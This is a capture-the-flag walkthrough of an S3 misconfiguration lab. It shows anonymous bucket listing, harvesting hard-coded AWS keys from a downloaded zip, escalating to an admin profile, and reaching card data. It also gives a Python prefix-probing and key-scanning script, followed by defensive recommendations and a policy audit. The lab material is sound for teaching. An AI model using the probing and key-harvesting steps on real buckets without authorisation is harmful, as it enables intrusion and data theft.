S3 Enumeration Basics
A walkthrough demonstrating how to enumerate S3, exploit a misconfiguration, and escalate privileges to obtain sensitive data.
Last updated
CTF Source: Pwned Labs
In this walkthrough, we're provided with a website link. After discovering the site is hosted on AWS S3, we'll learn how to enumerate S3 and, due to a misconfiguration, uncover additional credentials leading to the compromise of several secrets and credit card data.
Install the AWS CLI first (brew install awscli on macOS, apt install awscli on Debian/Ubuntu).
We'll start by visiting the website in our browser and inspecting its source code.
We'll discover the website is retrieving content from S3.
If we navigate directly to the CSS file's S3 URL, we'll discover we can see it: the object is readable without any authentication.
Let's try to traverse the directories of this bucket to see if we can access other files.
Let's try listing the bucket with the awscli, like so. The --no-sign-request flag is needed so the request goes out anonymously instead of being signed with whatever AWS credentials are configured locally (without it the CLI would either sign with those credentials or complain that it can't find any); that way the results show exactly what an unauthenticated user on the internet can see.
Okay, now we're noticing some files! Listing works for the shared/ prefix, but it doesn't appear we can list the contents of anything else. Let's attempt to download the file we found under shared/. Nice! It's a zip archive, so let's unzip it and read the contents. We found some creds: the script inside has AWS access keys hard-coded in it.
We can use the command aws configure to set up the credentials we just found. Let's try to enumerate those admin files we found previously. Okay, we're getting somewhere: listing admin/ now works. Can we download the data? Nope, the download is denied, so this identity can list admin/ but not read the objects in it. Let's move on to those migration-files and try that. Nice! Let's read the files.
Looks like we found several credentials for various systems! Let's test out the AWS IT Admin creds. Again, we'll set up our credentials like so; it's worth putting them in a named profile (aws configure --profile it-admin) so the first set of keys isn't overwritten and we can switch between the two identities with --profile. Let's try to download those admin files now. Success! We found the flag! Likewise, if we download the other file, website_transactions_export.csv, we'll uncover some plaintext credit card information!
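The steps above as one script, an added example that is not part of the original writeup or of the Pwned Labs material: the prefix probing mirrors aws s3 ls with --no-sign-request (anonymous) and with --profile (the keys found along the way), and the scanner pulls AWS access keys out of a downloaded zip archive in memory, which is the step that turns "a zip from shared/" into "creds". The network-facing functions need boto3 and a real bucket; the bucket name example-bucket, the profile name it-admin and the sample archive with its deploy script are assumptions (the key values in it are the placeholder keys from the AWS documentation, not real credentials), so the scanning part runs offline against the constructed archive.

```python
"""Added example (not the writeup's own code): probe S3 prefixes the way the
walkthrough does with the awscli, then scan a downloaded archive for hard-coded
AWS credentials. Bucket name, prefix list and sample archive are assumptions."""
import io
import re
import zipfile

# Access key IDs are 20 uppercase alphanumerics starting with AKIA (long-term)
# or ASIA (temporary). Secret keys are 40 base64-alphabet characters with no
# fixed prefix, so they are only matched next to a variable name that says
# what they are, which keeps false positives (hashes, other tokens) down.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
SECRET_KEY_RE = re.compile(
    r"(?i)(?:aws_?secret_?access_?key|secret_?key)\W{0,5}"
    r"([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])"
)


def scan_text_for_aws_credentials(source, text):
    """Return (source, kind, value) for every key-looking string in text."""
    found = [(source, "access_key_id", m.group(1)) for m in ACCESS_KEY_RE.finditer(text)]
    found += [(source, "secret_access_key", m.group(1)) for m in SECRET_KEY_RE.finditer(text)]
    return found


def scan_zip_for_aws_credentials(zip_bytes):
    """Scan every file inside a zip archive held in memory (like the one pulled
    from shared/ in the walkthrough) without extracting it to disk."""
    found = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            text = zf.read(info).decode("utf-8", errors="ignore")
            found.extend(scan_text_for_aws_credentials(info.filename, text))
    return found


def _s3_client(profile=None):
    """Unsigned client when profile is None (the awscli's --no-sign-request),
    otherwise a client on the named profile (the awscli's --profile)."""
    # Imported here so the offline credential scan works without boto3 installed.
    import boto3
    from botocore import UNSIGNED
    from botocore.config import Config

    if profile is None:
        return boto3.client("s3", config=Config(signature_version=UNSIGNED))
    return boto3.Session(profile_name=profile).client("s3")


def probe_prefixes(bucket, prefixes, profile=None):
    """Map each prefix to "listable" or to the S3 error code (AccessDenied,
    NoSuchBucket, ...) that a one-key listing of it returned. Network call."""
    from botocore.exceptions import ClientError

    s3 = _s3_client(profile)
    results = {}
    for prefix in prefixes:
        try:
            resp = s3.list_objects_v2(Bucket=bucket, Prefix=prefix, MaxKeys=1)
            results[prefix] = "listable" if resp.get("KeyCount", 0) else "listable (empty)"
        except ClientError as e:
            results[prefix] = e.response["Error"]["Code"]
    return results


def fetch_object(bucket, key, profile=None):
    """Download one object's bytes (the awscli's `aws s3 cp s3://bucket/key -`)."""
    return _s3_client(profile).get_object(Bucket=bucket, Key=key)["Body"].read()


# Constructed sample: a deploy script with credentials pasted in, standing in for
# the script inside the zip the walkthrough found. The key values are the
# placeholder keys from the AWS documentation, not real credentials.
SAMPLE_SCRIPT = """#!/bin/bash
# deploy.sh - pushes the site build into the bucket
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws s3 sync ./build s3://example-bucket/
"""


def build_sample_zip():
    """Build the constructed archive in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("deploy/deploy.sh", SAMPLE_SCRIPT)
        zf.writestr("deploy/README.txt", "No secrets in here.\n")
    return buf.getvalue()


if __name__ == "__main__":
    for source, kind, value in scan_zip_for_aws_credentials(build_sample_zip()):
        print(f"{source}: {kind} = {value}")
    # Live steps (need network, boto3 and a real bucket; "example-bucket" is assumed):
    # print(probe_prefixes("example-bucket", ["shared/", "admin/", "migration-files/"]))
    # print(probe_prefixes("example-bucket", ["admin/"], profile="it-admin"))
```

Run it as-is to see the scanner pick the two keys out of the constructed archive; then point probe_prefixes at a real bucket first unsigned and again with profile="it-admin" (or whatever you named the profile) to get the same listable/AccessDenied picture the walkthrough built by hand, one prefix at a time. The secret-key pattern deliberately requires a nearby name such as aws_secret_access_key, since a bare 40-character base64 match would flag every hash in a script.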
In this scenario, unauthorized access was obtained to a shared folder within the S3 bucket without authentication. Subsequently, a zip file was downloaded from this folder, revealing a script embedded with hard-coded AWS credentials. These credentials were leveraged to access the /migration-files/ folder, where a file containing additional hard-coded credentials, including those for the AWS IT Admin user, was retrieved. Utilizing the IT Admin credentials, we successfully obtained the flag and plaintext credit card data from the /admin/ directory of the S3 bucket.
Let's discuss a few issues we uncovered along the way.
Multi-use of an S3 bucket
It's clear that this bucket was used for multiple purposes (website hosting, credit card data storage, and some sort of secrets management migration).
Multi-use of a bucket like this can lead to unintended exposure, as we uncovered: the public read access the website needs lives in the same bucket, one prefix away from data that must never be public, so a single overly broad statement or prefix typo in the bucket policy exposes all of it.
Recommendation:
Separate buckets should be used for different use cases to reduce the likelihood of permission misconfiguration. Website assets can then live in a bucket that is intentionally public (ideally fronted by CloudFront), while S3 Block Public Access stays enabled on every other bucket so that a world-readable policy cannot be attached to them at all.
Mishandling of credit card data
The credit card data found was stored in plaintext, in a bucket that also serves a public website, which is not an appropriate location for it.
Recommendation:
Encrypt credit card data, and note that S3 server-side encryption with S3-managed keys (SSE-S3) alone would not have stopped this attack: any principal allowed to GetObject receives the decrypted object, so the IT Admin credentials would still have read the CSV (SSE-KMS only helps if the key policy denies the compromised principal kms:Decrypt). Ideally, don't store full card numbers at all; tokenize them or leave them with the payment processor.
Store this data in an appropriate location and restrict access to it.
World-readable shared directory
This directory was accessible by anyone without authentication and contained hard-coded secrets to several solutions.
The exposed secrets enabled privilege escalation, ultimately leading to the exfiltration of credit card data.
Recommendation:
Store secrets in a secrets manager rather than in scripts or files in S3, and restrict access to the prefix to the principals that need it; any secret that has been exposed this way should be rotated, since anyone may already have a copy.
If the data needs to be shared externally, consider enabling cross-account access via an IAM Role or sharing in an alternative secure solution (a pre-signed URL with a short expiry, for example) rather than opening the prefix to the world.
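To make the recommendations concrete, here is an added example (not from the original writeup or from Pwned Labs) of a bucket policy that reproduces the misconfiguration beside a corrected one, with a small audit function that answers what an anonymous caller can list or read under each. The bucket name example-bucket, the assets/ prefix for the website files, the account ID 111122223333 and the role name PartnerSharedReader are assumptions; the page does not publish the real policy.

```python
"""Added example, not from the original writeup: a bucket policy with a
world-readable shared/ prefix beside a corrected one, plus a small audit that
answers "what can an anonymous caller do?" for either. The bucket name, the
assets/ prefix, the account ID and the role name are constructed assumptions."""
import fnmatch

BUCKET = "example-bucket"  # assumed; the writeup does not publish the real name
ARN = f"arn:aws:s3:::{BUCKET}"

# Weak policy (constructed): the site's assets must be public, and at some point
# shared/ was opened to anyone as well, which is the hole the walkthrough goes
# through. admin/ and migration-files/ carry no anonymous grant, matching what
# the unsigned listing showed.
WEAK_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject",
         "Resource": [f"{ARN}/assets/*", f"{ARN}/shared/*"]},
        {"Sid": "PublicListShared", "Effect": "Allow", "Principal": {"AWS": "*"},
         "Action": ["s3:ListBucket"], "Resource": ARN,
         "Condition": {"StringLike": {"s3:prefix": ["shared/*"]}}},
    ],
}

# Corrected policy (constructed): anonymous access stops at assets/, and the
# party that needed shared/ gets it through a role in their own account.
# ListBucket and GetObject are separate statements on purpose: the s3:prefix
# condition key is absent on GetObject requests, so a combined statement would
# silently fail to grant the object reads.
FIXED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "PublicReadAssetsOnly", "Effect": "Allow", "Principal": "*",
         "Action": "s3:GetObject", "Resource": f"{ARN}/assets/*"},
        {"Sid": "PartnerListShared", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:role/PartnerSharedReader"},
         "Action": "s3:ListBucket", "Resource": ARN,
         "Condition": {"StringLike": {"s3:prefix": ["shared/*"]}}},
        {"Sid": "PartnerReadShared", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111122223333:role/PartnerSharedReader"},
         "Action": "s3:GetObject", "Resource": f"{ARN}/shared/*"},
    ],
}


def _as_list(value):
    """IAM lets most fields be a string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def is_anonymous(principal):
    """True for both spellings of 'anyone': "*" and {"AWS": "*"}."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def anonymous_grants(policy):
    """Every (sid, action, resource, prefix_patterns) an unauthenticated caller
    is allowed by the policy. prefix_patterns is () when there is no s3:prefix
    condition, i.e. the grant applies to any prefix."""
    grants = []
    for stmt in policy["Statement"]:
        if stmt.get("Effect") != "Allow" or not is_anonymous(stmt.get("Principal")):
            continue
        cond = stmt.get("Condition", {}).get("StringLike", {})
        prefixes = tuple(_as_list(cond.get("s3:prefix", [])))
        for action in _as_list(stmt["Action"]):
            for resource in _as_list(stmt["Resource"]):
                grants.append((stmt.get("Sid", ""), action, resource, prefixes))
    return grants


def anonymous_can_read(policy, bucket, key):
    """Would an unsigned GetObject on s3://bucket/key be allowed? IAM's *
    matches across '/', which fnmatch reproduces."""
    obj_arn = f"arn:aws:s3:::{bucket}/{key}"
    return any(action == "s3:GetObject" and fnmatch.fnmatchcase(obj_arn, resource)
               for _, action, resource, _ in anonymous_grants(policy))


def anonymous_can_list(policy, bucket, prefix):
    """Would an unsigned `aws s3 ls s3://bucket/prefix` be allowed? A missing
    s3:prefix (listing the root) never satisfies a StringLike condition."""
    bucket_arn = f"arn:aws:s3:::{bucket}"
    for _, action, resource, prefixes in anonymous_grants(policy):
        if action != "s3:ListBucket" or not fnmatch.fnmatchcase(bucket_arn, resource):
            continue
        if not prefixes or any(fnmatch.fnmatchcase(prefix, p) for p in prefixes):
            return True
    return False


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_POLICY), ("fixed", FIXED_POLICY)):
        for key in ("assets/site.css", "shared/deploy.zip", "admin/flag.txt"):
            print(f"{name}: anonymous read {key}: {anonymous_can_read(policy, BUCKET, key)}")
        print(f"{name}: anonymous list shared/: {anonymous_can_list(policy, BUCKET, 'shared/')}")
```

The audit only models the bucket policy; in a real account also check the bucket ACL, object ACLs and the S3 Block Public Access settings, because any one of them can reopen or close what the policy says. The weak policy reproduces exactly what the walkthrough observed (anonymous listing and reads under shared/, nothing under admin/), and the fixed one keeps the website working while leaving no anonymous path to shared/ at all.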